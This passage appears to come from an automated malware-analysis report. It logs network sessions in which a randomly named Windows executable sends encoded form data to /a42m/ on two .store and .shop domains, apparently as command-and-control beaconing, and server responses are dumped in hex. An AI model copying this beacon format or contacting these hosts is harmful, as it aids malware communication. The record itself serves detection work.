                          May 23, 2024 15:18:06.857809067 CEST735INHTTP/1.1 405 Not Allowed
                          Date: Thu, 23 May 2024 13:18:06 GMT
                          Content-Type: text/html
                          Content-Length: 556
                          Connection: close
                          Server: UD Webspace 3.2
                          Allow: GET, POST, HEAD
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.55367189.31.143.90807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:08.747181892 CEST773OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.leaflearn.store
                          Origin: http://www.leaflearn.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.leaflearn.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 6e 2b 65 4f 6a 49 74 48 38 52 45 78 37 67 75 56 67 78 36 32 73 72 50 4c 58 53 65 56 6e 46 69 42 70 6f 4c 59 67 61 44 2f 6b 4e 44 47 31 53 67 66 4b 59 5a 68 62 56 73 71 44 6e 4e 54 79 42 6f 68 45 73 68 75 53 35 4c 6b 64 2b 72 46 59 6c 4d 35 39 56 58 45 48 68 7a 2b 6f 59 41 30 79 54 6b 56 55 32 78 70 5a 65 4a 57 61 36 53 77 45 76 67 2f 33 56 55 63 66 2f 56 30 6c 6b 69 6a 41 62 68 41 74 78 2f 38 30 6f 48 48 51 43 33 2f 75 6f 4d 45 34 56 6c 69 50 4b 70 73 58 6c 43 59 7a 58 73 6f 4e 59 4d 65 30 38 69 55 42 65 31 7a 41 35 75 75 4e 73 48 64 6c 2f 44 35 6d 59 34 43 30 65 6a 39 62 75 64 58 79 42 31 56 4f 45 75 47 6f 49 61 68 66 37 33 54 32 4d 4b 37 6d 67 37 46
                          Data Ascii: vH5=n+eOjItH8REx7guVgx62srPLXSeVnFiBpoLYgaD/kNDG1SgfKYZhbVsqDnNTyBohEshuS5Lkd+rFYlM59VXEHhz+oYA0yTkVU2xpZeJWa6SwEvg/3VUcf/V0lkijAbhAtx/80oHHQC3/uoME4VliPKpsXlCYzXsoNYMe08iUBe1zA5uuNsHdl/D5mY4C0ej9budXyB1VOEuGoIahf73T2MK7mg7F
                          May 23, 2024 15:18:09.397471905 CEST735INHTTP/1.1 405 Not Allowed
                          Date: Thu, 23 May 2024 13:18:09 GMT
                          Content-Type: text/html
                          Content-Length: 556
                          Connection: close
                          Server: UD Webspace 3.2
                          Allow: GET, POST, HEAD
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.55367289.31.143.90807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:11.278501987 CEST1790OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.leaflearn.store
                          Origin: http://www.leaflearn.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.leaflearn.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 6e 2b 65 4f 6a 49 74 48 38 52 45 78 37 67 75 56 67 78 36 32 73 72 50 4c 58 53 65 56 6e 46 69 42 70 6f 4c 59 67 61 44 2f 6b 4e 4c 47 30 68 34 66 4c 35 5a 68 59 56 73 71 41 6e 4e 57 79 42 6f 77 45 73 4a 71 53 35 47 47 64 39 66 46 5a 48 45 35 30 45 58 45 4f 68 7a 2b 67 34 41 31 74 44 6b 36 55 32 68 74 5a 65 5a 57 61 36 53 77 45 70 4d 2f 68 30 55 63 64 2f 56 33 67 55 69 6e 52 4c 68 6f 74 31 72 47 30 6f 44 39 52 78 2f 2f 72 34 63 45 36 6a 5a 69 48 4b 70 55 61 46 44 4c 7a 58 68 32 4e 65 6f 61 30 34 71 2b 42 5a 5a 7a 45 4e 33 54 59 63 32 42 2f 74 48 4b 6d 49 77 54 70 4c 44 67 52 63 64 59 76 44 6c 46 43 55 79 2b 76 74 69 61 57 49 32 49 72 34 36 68 68 48 65 65 47 76 75 58 2f 6a 77 43 61 76 72 6a 44 45 6b 79 67 2f 49 33 2b 45 4e 62 43 54 48 41 78 34 67 31 76 2f 64 46 50 64 48 34 70 41 33 6c 65 79 77 69 64 51 41 42 4d 33 65 49 36 48 2f 68 71 41 66 54 50 59 64 32 5a 52 46 68 64 6a 5a 49 67 58 44 35 70 32 6a 6a 43 72 4a 59 48 76 62 36 7a 69 76 39 66 38 6e 4c 6f 74 4b 45 77 71 5a 4f 77 4e 55 46 47 54 [TRUNCATED]
                          Data Ascii: vH5=n+eOjItH8REx7guVgx62srPLXSeVnFiBpoLYgaD/kNLG0h4fL5ZhYVsqAnNWyBowEsJqS5GGd9fFZHE50EXEOhz+g4A1tDk6U2htZeZWa6SwEpM/h0Ucd/V3gUinRLhot1rG0oD9Rx//r4cE6jZiHKpUaFDLzXh2Neoa04q+BZZzEN3TYc2B/tHKmIwTpLDgRcdYvDlFCUy+vtiaWI2Ir46hhHeeGvuX/jwCavrjDEkyg/I3+ENbCTHAx4g1v/dFPdH4pA3leywidQABM3eI6H/hqAfTPYd2ZRFhdjZIgXD5p2jjCrJYHvb6ziv9f8nLotKEwqZOwNUFGTTh5kJ4SAZ8tm4CSjfbXx7xS2ausvvzgR7x3T8X1kpLFQgAObkqp8p/d833lcFhkcL4NIPFQkOy4Dc9a3th25i1iZ4Z7NhzBU4d627YEurT2QJX1vl8PYI4nFH2j99/Y8XZBw7jVWAZHGY8rECmje89FM8iqPY8ObWi1nOd2b4JFYyCfwGxrossszxfYfGIuQZ7o1a25GscFBjF4KervQZf08mIkBqGpdeIJjho4f5UqSXYBvXekrftwjSy3jFBrtnNS6rbDsvewWSEYJfPuOcRkkvCfLJg+WZqZEIIarUuMslHjRzWj/wSgIEVORL5Dc8YG9wEivDS8qvpbBmZ9vkL49fb1O0TV2pYadnrs2bRhSx1G2P8B3tbHzjJDSzGNxOGVz4lV8YtYG+sPZ7dJRYW3Az/MK65M1zWiUrIOI8PDVoDCbxTzOSkm6ga56fSshTzS5H4ekDdd9wZoezFRU3wdfECpK6GXJtZfG/W6Adc3Ptr/E1494BUMfpWkviPBRNNPwy2nn0ICo0UD/DrbGGyc+qnB0GkZ7v1vp9ps+ARcb3mOBHtFu9n0FCq7xUd7sqYd0rPLmECivBw+gaD94NWYdyXoAdr6AUAZwNvG/Yw5g4GpwBJVWRoIsyCwvNs/Ybq0aJbXuWP6UzmcUi8BIFkjsRaDyzv1XMz [TRUNCATED]
                          May 23, 2024 15:18:11.916659117 CEST735INHTTP/1.1 405 Not Allowed
                          Date: Thu, 23 May 2024 13:18:11 GMT
                          Content-Type: text/html
                          Content-Length: 556
                          Connection: close
                          Server: UD Webspace 3.2
                          Allow: GET, POST, HEAD
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.55367389.31.143.90807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:13.806008101 CEST485OUTGET /a42m/?R0nl4=f64p&vH5=q82ug4hJ4iMW1QeZ+GCgoJbZS3jVtW+Vvu2ntYvjkNah5D8fKd1XYREKBHF28ngiXJtWR4/9FoDVe0EJ2zKZXh/HzsdFhnk2W05Rc4EGYuWHBokuuF9nEMUprlqBVZ4vog== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.leaflearn.store
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:18:14.434719086 CEST1236INHTTP/1.1 200 OK
                          Date: Thu, 23 May 2024 13:18:14 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: UD Webspace 3.2
                          Data Raw: 31 39 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 69 65 72 74 20 62 65 69 20 75 6e 69 74 65 64 2d 64 6f 6d 61 69 6e 73 2e 64 65 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 69 6d 20 4b 75 6e 64 65 6e 61 75 66 74 72 61 67 20 72 65 67 69 73 74 72 69 65 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 2c 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 [TRUNCATED]
                          Data Ascii: 19e0<!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,html{height:100%;margin:0;padding:0;background-color:#fff;font-family:Arial,Verdana,sans-serif}body{text-align:center;background-color:#f0f2f3}.spacerTop{margin-top:40px}a:focus,a:hover,a:link,a:visited{margin:0;padding:0;border:none}.dvLink:focus,.dvLink:hover,.dvLink:link,.dvLink:visited{background:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAJCAYAAAARml2dAAAAHklEQVQImWNgqDzxn6HyxH8GDACToIckhYLIEmgAAAHCOEFxKWXwAAAAAElFTkSuQmCC') right center no-repeat;padding-right:12px;border:0 none;text-decoration:none;font-weight:400;color:#0079c8}.dvLink:hover{text-decoration:underline}.dvLink.no-ico{background:0 0;padding:0}.logo-wrapper{width:100%;background-color:#fff;padding:55px 0}#logo{margin:0 auto;width:600px;height:50px;background-position:left [TRUNCATED]
                          May 23, 2024 15:18:14.435739994 CEST224INData Raw: 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 2c 30 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41
                          Data Ascii: kground-size:contain,0 0;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUAAAAAyCAMAAAAa0/LmAAAARVBMVEUAAADw8vTf5/Dd3d3P2ujPz8+/zuHCwsKvwtmfttGxsbGPqsqampp/nsKMjIxni7d+fn5QeqxnZ2dAbqQwYp0XTpEAPYad8GA6AAA
                          May 23, 2024 15:18:14.438119888 CEST1236INData Raw: 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b 70 4a 43 45 4c 54 48 6b 48 4a 62 75 44 4e 39
                          Data Ascii: AAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oCPB/M/OhvF4F9C8O
                          May 23, 2024 15:18:14.440454960 CEST1236INData Raw: 73 63 79 69 75 43 51 78 59 4d 70 38 57 4f 50 2f 34 37 66 2f 31 50 56 42 78 48 73 2f 34 75 54 79 71 77 78 51 37 63 35 2b 38 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58
                          Data Ascii: scyiuCQxYMp8WOP/47f/1PVBxHs/4uTyqwxQ7c5+84z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RY
                          May 23, 2024 15:18:14.440473080 CEST1236INData Raw: 6f 4f 38 66 56 32 78 45 52 4a 7a 51 74 6d 65 45 66 2f 65 4a 37 66 39 7a 47 34 45 31 65 36 6c 53 55 2b 53 46 79 50 2b 6f 49 33 65 38 34 34 58 41 39 6f 55 42 4a 6c 31 7a 52 42 57 36 79 50 45 69 32 74 75 5a 36 48 30 6b 6c 31 75 61 61 51 53 44 46 45
                          Data Ascii: oO8fV2xERJzQtmeEf/eJ7f9zG4E1e6lSU+SFyP+oI3e844XA9oUBJl1zRBW6yPEi2tuZ6H0kl1uaaQSDFEbLAJd0nkG2XOHMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC');overflo
                          May 23, 2024 15:18:14.440485954 CEST1236INData Raw: 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 70 3e 3c 62 3e 57 61 72 75 6d 20 77 69 72 64 20 64 69 65 73 65 20 53 65 69 74 65 20 61
                          Data Ascii: v><div class="content-wrapper"><div class="content"><p><b>Warum wird diese Seite angezeigt?</b><br>Diese Seite wurde automatisch erstellt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese
                          May 23, 2024 15:18:14.445085049 CEST386INData Raw: 69 74 65 64 2d 64 6f 6d 61 69 6e 73 2e 64 65 2f 75 6e 74 65 72 6e 65 68 6d 65 6e 2f 6b 6f 6e 74 61 6b 74 2f 22 63 6c 61 73 73 3d 22 64 76 4c 69 6e 6b 22 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 49 6d 70 72 65 73 73
                          Data Ascii: ited-domains.de/unternehmen/kontakt/"class="dvLink"rel="nofollow noopener">Impressum</a></p><p><a href="https://www.united-domains.de/unternehmen/datenschutz/"class="dvLink"rel="nofollow noopener">Datenschutzhinweise</a></p></div></div><div cl


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.553674154.55.135.138807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:21.112389088 CEST756OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.p65cq675did.shop
                          Origin: http://www.p65cq675did.shop
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.p65cq675did.shop/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 69 53 34 6f 68 41 5a 68 79 6f 64 4a 49 33 68 70 6b 38 32 43 2b 57 5a 73 5a 41 79 4f 68 45 4c 63 73 6f 2f 6c 63 77 34 2b 46 34 48 4f 79 44 6a 6d 39 68 37 4b 56 34 42 41 58 71 47 4a 69 4e 4a 75 56 35 47 71 38 7a 44 48 6f 43 43 70 4d 70 4d 66 6c 36 33 36 54 4e 53 74 59 49 48 33 71 57 47 77 33 68 76 30 45 38 4c 49 68 6a 6d 31 59 38 55 61 34 47 72 65 78 70 52 61 48 74 2f 46 41 6c 48 4c 57 2b 39 53 5a 42 68 71 78 70 4c 4f 66 71 2b 46 6c 77 61 66 46 54 2f 4b 64 54 56 32 36 47 47 77 79 43 66 69 68 6e 78 44 71 6b 6f 5a 43 31 75 7a 6c 6e 41 61 7a 38 37 7a 56 4e 70 36 63 37 51 41 6a 58 4b 79 2b 39 73 3d
                          Data Ascii: vH5=iS4ohAZhyodJI3hpk82C+WZsZAyOhELcso/lcw4+F4HOyDjm9h7KV4BAXqGJiNJuV5Gq8zDHoCCpMpMfl636TNStYIH3qWGw3hv0E8LIhjm1Y8Ua4GrexpRaHt/FAlHLW+9SZBhqxpLOfq+FlwafFT/KdTV26GGwyCfihnxDqkoZC1uzlnAaz87zVNp6c7QAjXKy+9s=


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.553675154.55.135.138807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:25.089087009 CEST776OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.p65cq675did.shop
                          Origin: http://www.p65cq675did.shop
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.p65cq675did.shop/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 69 53 34 6f 68 41 5a 68 79 6f 64 4a 4b 58 52 70 6a 62 71 43 34 32 5a 74 46 51 79 4f 76 55 4c 59 73 6f 7a 6c 63 78 73 75 51 61 7a 4f 79 69 54 6d 36 6b 62 4b 5a 59 42 41 63 4b 47 4d 6d 4e 4a 6c 56 35 4b 49 38 32 6a 48 6f 44 6d 70 4d 70 63 66 6c 49 66 35 52 64 54 4c 42 59 48 31 75 57 47 77 33 68 76 30 45 38 76 75 68 6a 2b 31 59 73 6b 61 35 6b 50 64 74 35 52 5a 50 4e 2f 46 4c 46 48 50 57 2b 38 48 5a 45 42 45 78 72 6a 4f 66 6f 6d 46 6b 68 61 63 53 44 2f 51 58 7a 56 34 35 31 66 56 6f 51 44 62 39 58 35 46 2f 6b 51 42 4f 6a 44 5a 2f 46 49 79 67 63 58 4c 46 65 68 4e 4e 4c 78 70 35 30 61 43 67 71 36 46 36 53 52 54 6f 64 70 55 7a 49 67 49 6a 7a 6f 55 48 74 75 63
                          Data Ascii: vH5=iS4ohAZhyodJKXRpjbqC42ZtFQyOvULYsozlcxsuQazOyiTm6kbKZYBAcKGMmNJlV5KI82jHoDmpMpcflIf5RdTLBYH1uWGw3hv0E8vuhj+1Yska5kPdt5RZPN/FLFHPW+8HZEBExrjOfomFkhacSD/QXzV451fVoQDb9X5F/kQBOjDZ/FIygcXLFehNNLxp50aCgq6F6SRTodpUzIgIjzoUHtuc


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.553676154.55.135.138807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:27.621287107 CEST1793OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.p65cq675did.shop
                          Origin: http://www.p65cq675did.shop
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.p65cq675did.shop/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 69 53 34 6f 68 41 5a 68 79 6f 64 4a 4b 58 52 70 6a 62 71 43 34 32 5a 74 46 51 79 4f 76 55 4c 59 73 6f 7a 6c 63 78 73 75 51 61 72 4f 79 30 48 6d 36 46 62 4b 59 59 42 41 52 71 47 4e 6d 4e 4a 6b 56 35 69 4d 38 32 2f 35 6f 41 4f 70 4e 4b 45 66 73 63 4c 35 4c 4e 54 4c 63 49 48 30 71 57 47 35 33 68 2f 77 45 38 2f 75 68 6a 2b 31 59 75 73 61 70 47 72 64 76 35 52 61 48 74 2f 4a 41 6c 48 6e 57 2b 6b 58 5a 45 31 36 78 62 44 4f 47 49 32 46 6a 58 32 63 4e 7a 2f 57 55 7a 55 2b 35 31 6a 47 6f 51 65 69 39 55 6b 53 2f 6e 41 42 4e 47 69 35 6e 45 55 73 35 64 58 6d 43 74 6c 77 56 4f 52 4e 2b 55 2f 6f 71 64 4f 35 6d 42 74 71 69 6f 35 4e 34 73 39 6e 33 33 49 69 46 61 6a 4f 45 37 6b 55 6b 4b 47 62 6b 6c 70 52 2f 2b 36 55 6e 75 53 4c 44 49 6f 75 53 65 36 2f 41 5a 2b 65 58 64 75 33 51 76 76 61 35 58 73 4f 48 63 35 35 66 6c 52 6b 6a 4f 53 2f 79 34 